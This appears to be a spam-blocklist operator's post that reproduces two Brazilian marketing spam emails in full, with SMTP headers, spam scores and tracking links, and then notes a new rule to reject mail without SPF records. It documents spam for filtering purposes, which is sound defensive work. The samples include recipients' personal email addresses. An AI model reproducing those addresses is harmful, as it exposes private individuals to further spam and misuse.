src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/accroche.jpg"
width="550" height="204" border="0" alt="3 anos" /></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/top-text.jpg"
width="550" height="14" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td rowspan="2"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/left.jpg"
width="206" height="231" border="0" alt="35% Off" /></a></td>
<td width="298" height="173" style="text-align:
center;"><span style="font-family: Arial, Helvetica, sans-serif; font-size:
17px; color: #a22943;"> Saboreie um dos australianos <br /> mais
vendidos<br /> <br /> <strong style="color: #c18520; font-size: 20px;">2010
Lindeman&rsquo;s Cawarra</strong><br /> De <strike>R$45,90</strike> por
<strong style="font-size: 40px;">29,90<sup style="font-size:
14px;">1</sup></strong></span></td>
<td rowspan="2"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/rigth.jpg"
width="46" height="231" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/btn.gif"
width="298" height="58" border="0" alt="Brinde conosco" /></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/bottom.jpg"
width="550" height="42" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td width="550" height="29" colspan="3"
style="text-align: center;"><span style="font-family: Arial, Helvetica,
sans-serif; font-size: 10px; color: #999;"> <sup>1</sup>Na compra de quatro
garrafas </span></td>
</tr>
<tr>
<td align="center" colspan="3">
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 15px 0 5px 0;">Conhe&ccedil;a nossa
<a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank" style="text-decoration: underline; color:
#666666;">Pol&iacute;tica de Privacidade.</a></p>
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 5px 0 5px 0;">Caso n&atilde;o queira
mais receber nossos informativos, <a
href="http://baratomail4.com.br/unsubscribe.php?M=1289652&C=c3022500f5f5b55357bb0bd5b2bd14ba&L=5&N=22"
target="_blank"><font color="#666666"><u>acesse este link</u></font></a> e
cancele sua inscri&ccedil;&atilde;o.</p>
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 5px 0 5px 0;">2014 O Melhor Vinho do
Mundo - Todos os direitos reservados.</p>
</td>
</tr>
</tbody>
</table>
</center><img
src="http://tru.webelapp.com/adtckom.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br"
/>
<img
src="http://baratomail4.com.br/open.php?M=1289652&L=5&N=22&F=H&image=.jpg"
height="1" width="10"></body>
</html>

a other Mail is:

Return-Path: <bounce-2696-19326188-4124-248@hiperlux.com.br>
Delivered-To: root@blocklist.de
Received: by mail.blocklist.de (Postfix, from userid 1001)
	id 8D69A2F1B76; Thu, 20 Mar 2014 06:52:32 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 8D69A2F1B76
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
	server5.customer-config.de
X-Spam-Level: **
X-Spam-ASN: AS18881 186.215.224.0/19
X-Spam-Status: No, hits=2.6 required=5.5 tests=AWL=-0.625,BAYES_00=-6.1,
	FUZZY_CREDIT=1.678,HTML_IMAGE_RATIO_04=0.556,HTML_MESSAGE=0.001,
	RAZOR2_CF_RANGE_51_100=0.5,RAZOR2_CF_RANGE_E8_51_100=1.886,RAZOR2_CHECK=0.922,
	RDNS_NONE=0.793,SPF_HELO_PASS=-0.001,URIBL_BLACK=1.725,URIBL_JP_SURBL=1.25
	bayes=0.0000 relaysuntrusted=[ ip=186.215.253.93 rdns= helo=irmadulce.org.br
	by=smtp-mx.blocklist.de ident= envfrom= intl=0 id=4430BD592E593 auth= msa=0 ]
	[ ip=213.252.246.27 rdns= helo=hiper27.hiperlux.com.br by=QA-Mail ident=
	envfrom= intl=0 id= auth= msa=0 ] autolearn=disabled scanned=[Thu, 20 Mar
	2014 06:52:32 +0100] version=3.3.1
Received: from smtp-mx.blocklist.de (smtp-mx.blocklist.de [93.180.154.80])
	by mail.blocklist.de (Postfix) with ESMTP id A45362F1A6A
	for <root@blocklist.de>; Thu, 20 Mar 2014 06:52:19 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de A45362F1A6A
Received-SPF: none (hiperlux.com.br: No applicable sender policy available) receiver=smtp-mx.blocklist.de; identity=mailfrom; envelope-from="bounce-2696-19326188-4124-248@hiperlux.com.br"; helo=irmadulce.org.br; client-ip=186.215.253.93
X-DKIM: OpenDKIM Filter v2.0.1 smtp-mx.blocklist.de 4430BD592E593
Received: from irmadulce.org.br (unknown [186.215.253.93])
	by smtp-mx.blocklist.de (Postfix) with SMTP id 4430BD592E593
	for <postmaster@blocklist.de>; Thu, 20 Mar 2014 06:53:51 +0100 (CET)
X-Qamailsafe-Spam-Score: 99
X-QamailSafe-Checksum: dfb0ca8c4697d217b63e40816742068736151bac7c4c252c3ec6069092015da4
X-QamailSafe-Source-Addr: 213.252.246.27
Received: from 213.252.246.27 (EHLO hiper27.hiperlux.com.br)
  by QA-Mail Safe 7.0.14; Thu, 20 Mar 2014 00:08:14 -0300
Date: Thu, 20 Mar 2014 00:06:16 -0300
To: "valdson.santos@irmadulce.org.br" <valdson.santos@irmadulce.org.br>
From: Triton - Roupas e Acessorios <Triton@hiperlux.com.br>
Reply-to: Triton - Roupas e Acessorios <Triton@hiperlux.com.br>
Subject: Presente para voce, consumidor: ate 60% off em pecas selecionadas
Message-ID: <ee5e6dfa82664ef97b3debab3faf58ca@localhost.localdomain>
X-Priority: 3
Sender: <"user-rt@info"@hiperlux.com.br>
X-Mailer: OEM
X-Complaints-To: spam-report@hiperlux.com.br
List-Unsubscribe: <http://hiperlux.com.br/media/u.php?p=s5/rs/21vc/sc/u4/rs>
X-MessageID: s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs
X-Report-Abuse: <http://hiperlux.com.br/media/report_abuse.php?mid=s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs>
X-SMTPAPI: {"unique_args":{"abuse-id":"s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs"}, "category":"campaign"}
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="b1_ee5e6dfa82664ef97b3debab3faf58ca"

--b1_ee5e6dfa82664ef97b3debab3faf58ca
Content-Type: text/plain; charset = "utf-8"
Content-Transfer-Encoding: quoted-printable

Ola,=0A=0AAproveite essa chance e acesse esse email para desfrutar dos melh=
ores negocios disponiveis no mercado.=0A=0ATemos certeza que voce nao ira s=
e arrepender mas nao demore pois so valem hoje.em at=C3=A9 10x - 1 troca gr=
=C3=A1tis - Frete Gr=C3=A1tis =C3=A0 partir R$ 299=0A=0A( http://www.triton=
.com.br/?utm_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D140319 )=
=0A( http://beta.triton.com.br/feminino?utm_source=3DGet_mail&utm_medium=3D=
Disparo&utm_campaign=3D140319 )=0A( http://beta.triton.com.br/masculino?utm=
_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D140319 )=0A( http://=
www.triton.com.br/hotsite/sale-triton?utm_source=3DGet_mail&utm_medium=3DDi=
sparo&utm_campaign=3D140319 )=0A=0A( http://www.triton.com.br/hotsite/sale-=
triton?utm_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D140319 )=
=0A=0A( http://www.triton.com.br/hotsite/sale-triton?utm_source=3DGet_mail&=
utm_medium=3DDisparo&utm_campaign=3D140319 )=0A=0A( http://www.triton.com.b=
r/hotsite/sale-triton?url1=3Dfeminino&page=3D1#sidebar&utm_source=3DGet_mai=
l&utm_medium=3DDisparo&utm_campaign=3D140319 )=0A( http://www.triton.com.br=
/hotsite/sale-triton?url1=3Dmasculino&page=3D1&utm_source=3DGet_mail&utm_me=
dium=3DDisparo&utm_campaign=3D140319 )=0A=0A( http://www.triton.com.br/hots=
ite/sale-triton?utm_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D1=
40319 )=0A=0A( http://instagram.com/tritonoficial )=0A( https://www.faceboo=
k.com/tritonpage )=0A( http://www.youtube.com/tritonlovers )=0A( http://twi=
tter.com/TritonLovers )=0A=0ASEGURAN=C3=87A E PRIVACIDADE=0A=0AVoc=C3=AA re=
cebeu esta mensagem porque se cadastrou para receber=0Ae-mails da Triton. N=
=C3=B3s respeitamos a sua privacidade. Caso n=C3=A3o=0Aqueira mais receber =
mais mensagens da Triton, cancele o=0Arecebimento no link de descadastro no=
 final deste=0Ae-mail. O envio de e-mails ser=C3=A1 feito apenas com o seu=
=0Aconsentimento e poder=C3=A1 ser desativado h=C3=A1 qualquer momento. Som=
os=0Acontra o envio de e-mails sem autoriza=C3=A7=C3=A3o pr=C3=A9via (conhe=
cidos como=0ASPAM), no entanto, ap=C3=B3s requisitar o cancelamento a Trito=
n poder=C3=A1=0Alevar at=C3=A9 sete dias para processar sua solicita=C3=A7=
=C3=A3o.=0A=0AENTREGA=0A=0AComprando em nosso site, voc=C3=AA receber=C3=A1=
 os produtos de maneira=0Ar=C3=A1pida, eficiente e segura. Nosso prazo =C3=
=A9 de at=C3=A9 08 (oito) dias=0A=C3=BAteis para capitais e regi=C3=B5es me=
tropolitanas ap=C3=B3s a confirma=C3=A7=C3=A3o=0Ado pagamento. Para as dema=
is cidades, o prazo =C3=A9 de at=C3=A9 15=0A(quinze) dias =C3=BAteis. Duran=
te o processo de compra voc=C3=AA poder=C3=A1=0Acalcular a estimativa do pr=
azo de entrega que ser=C3=A1 informada. O=0Aprazo para entrega dos produtos=
 varia de acordo com o peso de=0Aproduto, local de entrega e tipo de envio.=
 O recebimento do=0Apedido pode ser realizado por terceiros, como porteiros=
 de=0Acondom=C3=ADnios e familiares, desde que assinem o comprovante de=0Ar=
ecebimento da mercadoria. S=C3=A3o realizadas tr=C3=AAs tentativas de=0Aent=
rega, em dias =C3=BAteis consecutivos. Ocorrendo tr=C3=AAs tentativas de=0A=
entrega sem sucesso o produto ser=C3=A1 devolvido ao Centro de=0ADistribui=
=C3=A7=C3=A3o da loja online. Para um novo envio o custo do frete=0A=C3=A9 =
por conta do cliente e ser=C3=A1 dado um novo prazo de entrega. Os=0Aprodut=
os ser=C3=A3o entregues de segunda a s=C3=A1bado em hor=C3=A1rio=0Acomercia=
l.=0AO frete =C3=A9 gr=C3=A1tis para pedidos acima de R$ 299,00.=0A=0APAGAM=
ENTO=0A=0AAceitamos pagamento por Boleto Banc=C3=A1rio ou por Cart=C3=A3o=
=0Ade Cr=C3=A9dito (Visa, Mastercard, Diners, Amex, Elo e Discover) em=0Aat=
=C3=A9 10x sem juros. Todas as formas de pagamento=0Atamb=C3=A9m est=C3=A3o=
 dispon=C3=ADveis no Televendas (47) 3390-5503.=0A=0ACONTATO=0A=0APara envi=
ar suas d=C3=BAvidas, sugest=C3=B5es ou coment=C3=A1rios, contate-nos=0Aatr=
aves do Telefone: (47) 3390-5503 |=0AChat: acesse aqui ( http://e2e.neoassi=
st.com/?action=3Dneolive&scr=3Drequest&th=3Dtritonnovo&ForcaAutenticar=3D1&=
UMail=3D&email=3D&name=3D&uName=3D=3D ) | Email: contato@e2e.com.br=0ANosso=
 hor=C3=A1rio de atendimento =C3=A9 de segunda =C3=A0 sexta-feira=0Adas 8 =
=C3=A0s 17h, (exceto feriados).=0A=0APRE=C3=87O=0A=0AO pre=C3=A7o dos produ=
tos podem sofrer altera=C3=A7=C3=B5es sem aviso pr=C3=A9vio.=0ACaso haja di=
verg=C3=AAncia do pre=C3=A7o da loja virtual com o da=0Anewsletter, o valor=
 a considerar ser=C3=A1 o da loja.=0A=0A( http://www.triton.com.br/ )Caso n=
ao deseje mais receber envie nos um email

--b1_ee5e6dfa82664ef97b3debab3faf58ca
Content-Type: text/html; charset = "utf-8"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.=
w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">=0A<html xmlns=3D"http://www.=
w3.org/1999/xhtml">=0A<head>=0A<meta http-equiv=3D"Content-Type" content=3D=
"text/html; charset=3DUTF-8" />=0A<title>Triton</title>=0A<style type=3D"te=
xt/css">=0A<!--=0Abody {=0A  margin-left: 0px;=0A  margin-top: 0px;=0A  mar=
gin-right: 0px;=0A  margin-bottom: 0px;=0A}=0A-->=0A</style></head>=0A=0A<b=
ody bgcolor=3D"#fff">=0A=0A<p style=3D"text-align: center;"><a href=3D"http=
://hiperlux.com.br/media/wb.php?p=3Ds5/u4/rs/21vc/sc/rs">Caso nao consiga v=
er essa mensagem acesse</a></p>=0A<table border=3D"0" cellspacing=3D"0" cel=
lpadding=3D"0" align=3D"center" style=3D"border: 1px solid #000000; width: =
600px;">=0A<tbody>=0A<tr>=0A<td height=3D"40" bgcolor=3D"#FFFFFF" style=3D"=
padding-left: 10px; border-right: solid 1px #000;"><font style=3D"font-fami=
ly: Arial, Helvetica, sans-serif; font-size: 9px; color: #000; text-transfo=
rm: uppercase;">em at&eacute; 10x - 1 troca gr&aacute;tis - Frete Gr&aacute=
;tis &agrave; partir R$ 299</font></td>=0A<td align=3D"right" bgcolor=3D"#F=
FFFFF" style=3D"padding-right: 10px;"><font style=3D"font-family: Arial, He=
lvetica, sans-serif; font-size: 9px; color: #000; text-transform: uppercase=
;"><br /><font style=3D"text-decoration: underline;"></font></font></td>=0A=
</tr>=0A</tbody>=0A</table>=0A<table border=3D"0" align=3D"center" cellpadd=
ing=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td=
><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Tri=
ton/http%3A%2F%2Fwww.triton.com.br%2F%3Futm_source%3DGet_mail%26utm_medium%=
3DDisparo%26utm_campaign%3D140319" title=3D"Triton" target=3D"_blank"><img =
src=3D"http://www.e2e.com.br/E/20140318_Triton/images/img_02.jpg" alt=3D"Tr=
iton" width=3D"334" height=3D"91" border=3D"0" style=3D"display: block;" />=
</a></td>=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs=
/21vc/sc/rs/Feminino/http%3A%2F%2Fbeta.triton.com.br%2Ffeminino%3Futm_sourc=
e%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=3D"Femin=
ino" target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/=
images/img_03.jpg" alt=3D"Feminino" width=3D"99" height=3D"91" border=3D"0"=
 style=3D"display: block;" /></a></td>=0A<td><a href=3D"http://hiperlux.com=
.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Masculino/http%3A%2F%2Fbeta.triton=
.com.br%2Fmasculino%3Futm_source%3DGet_mail%26utm_medium%3DDisparo%26utm_ca=
mpaign%3D140319" title=3D"Masculino" target=3D"_blank"><img src=3D"http://w=
ww.e2e.com.br/E/20140318_Triton/images/img_04.jpg" alt=3D"Masculino" width=
=3D"110" height=3D"91" border=3D"0" style=3D"display: block;" /></a></td>=
=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/=
rs/Sale/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Futm_source=
%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=3D"Sale" =
target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/image=
s/img_05.jpg" alt=3D"Sale" width=3D"57" height=3D"91" border=3D"0" style=3D=
"display: block;" /></a></td>=0A</tr>=0A</tbody>=0A</table>=0A<!--conteudo-=
->=0A<table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" align=3D"cente=
r" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td colspan=3D"2"><a href=3D=
"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Dia%20do%20Con=
sumidor%20-%20at%26eacute%3B%2060%25%20off/http%3A%2F%2Fwww.triton.com.br%2=
Fhotsite%2Fsale-triton%3Futm_source%3DGet_mail%26utm_medium%3DDisparo%26utm=
_campaign%3D140319" title=3D"Dia do Consumidor - at&eacute; 60% off" target=
=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140319_TritonConsumidor/i=
mages/img_02.jpg" alt=3D"Dia do Consumidor - at&eacute; 60% off" width=3D"6=
00" height=3D"194" border=3D"0" style=3D"display: block;" /></a></td>=0A</t=
r>=0A<tr>=0A<td colspan=3D"2"><a href=3D"http://hiperlux.com.br/media/tl.ph=
p?p=3Ds5/u4/rs/21vc/sc/rs/Dia%20do%20Consumidor%20-%20at%26eacute%3B%2060%2=
5%20off/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Futm_source=
%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=3D"Dia do=
 Consumidor - at&eacute; 60% off" target=3D"_blank"><img src=3D"http://www.=
e2e.com.br/E/20140319_TritonConsumidor/images/img_03.jpg" alt=3D"Dia do Con=
sumidor - at&eacute; 60% off" width=3D"600" height=3D"182" border=3D"0" sty=
le=3D"display: block;" /></a></td>=0A</tr>=0A<tr>=0A<td><a href=3D"http://h=
iperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Feminino/http%3A%2F%2Fw=
ww.triton.com.br%2Fhotsite%2Fsale-triton%3Furl1%3Dfeminino%26page%3D1%23sid=
ebar%26utm_source%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319=
" title=3D"Feminino" target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/=
20140319_TritonConsumidor/images/img_04.jpg" alt=3D"Feminino" width=3D"173"=
 height=3D"219" border=3D"0" style=3D"display: block;" /></a></td>=0A<td><a=
 href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Mascul=
ino/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Furl1%3Dmasculi=
no%26page%3D1%26utm_source%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign=
%3D140319" title=3D"Masculino" target=3D"_blank"><img src=3D"http://www.e2e=
.com.br/E/20140319_TritonConsumidor/images/img_05.jpg" alt=3D"Masculino" wi=
dth=3D"427" height=3D"219" border=3D"0" style=3D"display: block;" /></a></t=
d>=0A</tr>=0A<tr>=0A<td colspan=3D"2"><a href=3D"http://hiperlux.com.br/med=
ia/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Dia%20do%20Consumidor%20-%20at%26eacute%3=
B%2060%25%20off/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Fut=
m_source%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=
=3D"Dia do Consumidor - at&eacute; 60% off" target=3D"_blank"><img src=3D"h=
ttp://www.e2e.com.br/E/20140319_TritonConsumidor/images/img_06.jpg" alt=3D"=
Dia do Consumidor - at&eacute; 60% off" width=3D"600" height=3D"77" border=
=3D"0" style=3D"display: block;" /></a></td>=0A</tr>=0A</tbody>=0A</table>=
=0A<!--fim conteudo-->=0A<table border=3D"0" align=3D"center" cellpadding=
=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td><i=
mg style=3D"display: block;" border=3D"0" src=3D"http://www.e2e.com.br/E/20=
140318_Triton/images/img_13.jpg" width=3D"231" height=3D"64" /></td>=0A<td>=
<a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Inst=
agram/http%3A%2F%2Finstagram.com%2Ftritonoficial" title=3D"Instagram" targe=
t=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/images/img=
_14.jpg" alt=3D"Instagram" width=3D"34" height=3D"64" border=3D"0" style=3D=
"display: block;" /></a></td>=0A<td><a href=3D"http://hiperlux.com.br/media=
/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Facebook/https%3A%2F%2Fwww.facebook.com%2Ft=
ritonpage" title=3D"Facebook" target=3D"_blank"><img src=3D"http://www.e2e.=
com.br/E/20140318_Triton/images/img_15.jpg" alt=3D"Facebook" width=3D"35" h=
eight=3D"64" border=3D"0" style=3D"display: block;" /></a></td>=0A<td><a hr=
ef=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Youtube/h=
ttp%3A%2F%2Fwww.youtube.com%2Ftritonlovers" title=3D"Youtube" target=3D"_bl=
ank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/images/img_16.jpg"=
 alt=3D"Youtube" width=3D"34" height=3D"64" border=3D"0" style=3D"display: =
block;" /></a></td>=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=
=3Ds5/u4/rs/21vc/sc/rs/Twitter/http%3A%2F%2Ftwitter.com%2FTritonLovers" tit=
le=3D"Twitter" target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/201403=
18_Triton/images/img_17.jpg" alt=3D"Twitter" width=3D"36" height=3D"64" bor=
der=3D"0" style=3D"display: block;" /></a></td>=0A<td><img style=3D"display=
: block;" border=3D"0" src=3D"http://www.e2e.com.br/E/20140318_Triton/image=
s/img_18.jpg" width=3D"230" height=3D"64" /></td>=0A</tr>=0A</tbody>=0A</ta=
ble>=0A<table border=3D"0" align=3D"center" cellpadding=3D"0" cellspacing=
=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td align=3D"center" bgc=
olor=3D"#FFFFFF"><font style=3D"font-family: Arial, Helvetica, sans-serif; =
font-size: 11px; color: #503a5d;">SEGURAN&Ccedil;A E PRIVACIDADE<br /> <br =
/> <font style=3D"color: #636363;">Voc&ecirc; recebeu esta mensagem porque =
se cadastrou para receber e-mails da Triton. N&oacute;s respeitamos a sua p=
rivacidade. Caso n&atilde;o queira mais receber mais mensagens da Triton, c=
ancele o recebimento no link de descadastro no final deste<br /> e-mail. O =
envio de e-mails ser&aacute; feito apenas com o seu consentimento e poder&a=
acute; ser desativado h&aacute; qualquer momento. Somos contra o envio de e=
-mails sem autoriza&ccedil;&atilde;o pr&eacute;via (conhecidos como SPAM), =
no entanto, ap&oacute;s requisitar o cancelamento a Triton poder&aacute; le=
var at&eacute; sete dias para processar sua solicita&ccedil;&atilde;o.</fon=
t></font></td>=0A</tr>=0A</tbody>=0A</table>=0A<table border=3D"0" align=3D=
"center" cellpadding=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tb=
ody>=0A<tr>=0A<td width=3D"300" align=3D"center" valign=3D"top" bgcolor=3D"=
#FFFFFF"><font style=3D"font-family: Arial, Helvetica, sans-serif; font-siz=
e: 11px; color: #503a5d;"><br /> ENTREGA<br /> <br /> <font style=3D"color:=
 #636363;">Comprando em nosso site, voc&ecirc; receber&aacute; os produtos =
de maneira r&aacute;pida, eficiente e segura. Nosso prazo &eacute; de at&ea=
cute; 08 (oito) dias &uacute;teis para capitais e regi&otilde;es metropolit=
anas ap&oacute;s a confirma&ccedil;&atilde;o do pagamento. Para as demais c=
idades, o prazo &eacute; de at&eacute; 15 (quinze) dias &uacute;teis. Duran=
te o processo de compra voc&ecirc; poder&aacute; calcular a estimativa do p=
razo de entrega que ser&aacute; informada. O prazo para entrega dos produto=
s varia de acordo com o peso de produto, local de entrega e tipo de envio. =
O recebimento do pedido pode ser realizado por terceiros, como porteiros de=
 condom&iacute;nios e familiares, desde que assinem o comprovante de recebi=
mento da mercadoria. S&atilde;o realizadas tr&ecirc;s tentativas de entrega=
, em dias &uacute;teis consecutivos. Ocorrendo tr&ecirc;s tentativas de ent=
rega sem sucesso o produto ser&aacute; devolvido ao Centro de Distribui&cce=
dil;&atilde;o da loja online. Para um novo envio o custo do frete &eacute; =
por conta do cliente e ser&aacute; dado um novo prazo de entrega. Os produt=
os ser&atilde;o entregues de segunda a s&aacute;bado em hor&aacute;rio come=
rcial.<br /> O frete &eacute; gr&aacute;tis para pedidos acima de R$ 299,00=
.</font></font></td>=0A<td width=3D"300" align=3D"center" valign=3D"top" bg=
color=3D"#FFFFFF"><font style=3D"font-family: Arial, Helvetica, sans-serif;=
 font-size: 11px; color: #636363;"><br /> <font style=3D"color: #503a5d;">P=
AGAMENTO</font><br /> <br /> Aceitamos pagamento por Boleto Banc&aacute;rio=
 ou por Cart&atilde;o<br /> de Cr&eacute;dito (Visa, Mastercard, Diners, Am=
ex, Elo e Discover) em at&eacute; 10x sem juros. Todas as formas de pagamen=
to<br /> tamb&eacute;m est&atilde;o dispon&iacute;veis no Televendas (47) 3=
390-5503. <br /> <font style=3D"color: #503a5d;"><br /> CONTATO</font> <br =
/> <br /> Para enviar suas d&uacute;vidas, sugest&otilde;es ou coment&aacut=
e;rios, contate-nos atraves do Telefone: (47) 3390-5503 |<br /> Chat: acess=
e <a style=3D"color: #503a5d;" href=3D"http://hiperlux.com.br/media/tl.php?=
p=3Ds5/u4/rs/21vc/sc/rs//http%3A%2F%2Fe2e.neoassist.com%2F%3Faction%3Dneoli=
ve%26scr%3Drequest%26th%3Dtritonnovo%26ForcaAutenticar%3D1%26UMail%3D%26ema=
il%3D%26name%3D%26uName%3D%3D" target=3D"_blank">aqui</a> | Email: contato@=
e2e.com.br<br /> Nosso hor&aacute;rio de atendimento &eacute; de segunda &a=
grave; sexta-feira<br /> das 8 &agrave;s 17h, (exceto feriados). <br /> <br=
 /> <font style=3D"color: #503a5d;">PRE&Ccedil;O</font><br /> <br /> O pre&=
ccedil;o dos produtos podem sofrer altera&ccedil;&otilde;es sem aviso pr&ea=
cute;vio. Caso haja diverg&ecirc;ncia do pre&ccedil;o da loja virtual com o=
 da newsletter, o valor a considerar ser&aacute; o da loja. </font></td>=0A=
</tr>=0A</tbody>=0A</table>=0A<br />=0A<table border=3D"0" align=3D"center"=
 cellpadding=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<=
tr>=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/=
sc/rs/Rodape/http%3A%2F%2Fwww.triton.com.br%2F" title=3D"Rodape" target=3D"=
_blank"><img style=3D"display: block;" border=3D"0" src=3D"http://www.e2e.c=
om.br/E/20140318_Triton/images/img_20.jpg" alt=3D"Rodape" width=3D"600" hei=
ght=3D"66" /></a></td>=0A</tr>=0A</tbody>=0A</table>=0A<p style=3D"text-ali=
gn: center;"><a href=3D"http://hiperlux.com.br/media/u.php?p=3Ds5/rs/21vc/s=
c/u4/rs/rt">Se nao quiser mais receber esses emails acesse aqui</a></p>=0A=
=0A=0A<img src=3D"http://hiperlux.com.br/media/to.php?p=3Ds5/u4/rs/21vc/sc/=
rs" width=3D"5" height=3D"2" alt=3D".">=0A=0A</body>=0A</html>

--b1_ee5e6dfa82664ef97b3debab3faf58ca--

So, we reject now all Mails which has no spf-Records and sent a Mail to postmaster@ or have a X-MESSAGE-ID

The most Mails was now reject because there has no spf-record or false, are listen in spamhaus.org or a header-map entry matcht:

